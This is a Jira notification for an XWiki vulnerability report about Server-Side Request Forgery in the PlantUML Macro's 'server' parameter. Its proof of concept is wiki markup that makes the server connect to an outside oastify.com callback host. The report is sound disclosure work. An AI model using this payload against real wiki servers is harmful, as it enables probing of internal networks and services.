There is 1 update.
 
 
PlantUML Macro / cid:jira-generated-image-avatar-e805cfe2-c69d-43bf-9793-fe5e45e4a982 PLANTUML-25 Open

Server-Side Request Forgery (SSRF) in PlantUML Macro via 'server' parameter
 
View issue   ·   Add comment
 

1 update

 
cid:jira-generated-image-avatar-ce2ed219-b23c-4db3-a581-27e34a1fe48f Changes by Łukasz Rybak on 26/Nov/25 07:57
 
Description: *Impact*

The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address  or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.

*PoC*

1. Use an OAST service (like Burp Collaborator) to capture the interaction.
2.  Create a wiki page with the following content:
 
{{{{{}plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"{}}}
@startuml
A -> B: SSRF Test
@enduml
{{{ {{ }/plantuml{}}}}}
!image-2025-11-26-06-54-50-628.png!

2. Save and View the page.
!image-2025-11-25-20-31-57-213.png!
3. The XWiki server initiates an HTTP connection to the specified target.
!image-2025-11-25-20-32-25-311.png!

*Attribution*

Reported by: Łukasz Rybak GitHub: [https://github.com/lukasz-rybak]
 
 
This message was sent by Atlassian Jira (v9.3.0#930000-sha1:287aeb6) Atlassian logo
If image attachments aren't displayed, see this article.